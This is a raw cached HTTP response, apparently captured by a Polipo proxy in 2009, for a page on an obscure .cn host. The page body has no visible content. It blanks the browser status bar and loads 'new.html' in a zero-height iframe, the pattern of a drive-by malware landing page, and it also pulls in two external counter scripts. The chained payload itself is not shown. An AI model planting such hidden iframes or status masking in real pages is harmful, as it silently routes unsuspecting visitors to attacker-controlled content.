HTTP/1.1 200 OK
Content-Length: 352
ETag: "84c6e1bb87a1c91:299"
Date: Thu, 12 Mar 2009 07:05:39 GMT
Last-Modified: Tue, 10 Mar 2009 13:54:30 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Polipo-Location: http://kghytgv.cn:6135/b094933/b09.htm
X-Polipo-Date: Thu, 12 Mar 2009 07:13:39 GMT
X-Polipo-Access: Wed, 18 Mar 2009 08:57:57 GMT

<SCRIPT>window.defaultStatus=".";</SCRIPT>
<iframe src=new.html  height=0  width=100 ></iframe>
<BR>
</BR>
<BR>
</BR>

<script language="JavaScript" src="http://count1.51much.com/cnt.php?uid=UA-1-12775&style=icon"></script>

<script src="http://s142.cnzz.com/stat.php?id=1138902&web_id=1138902" language="JavaScript" charset="gb2312"></script>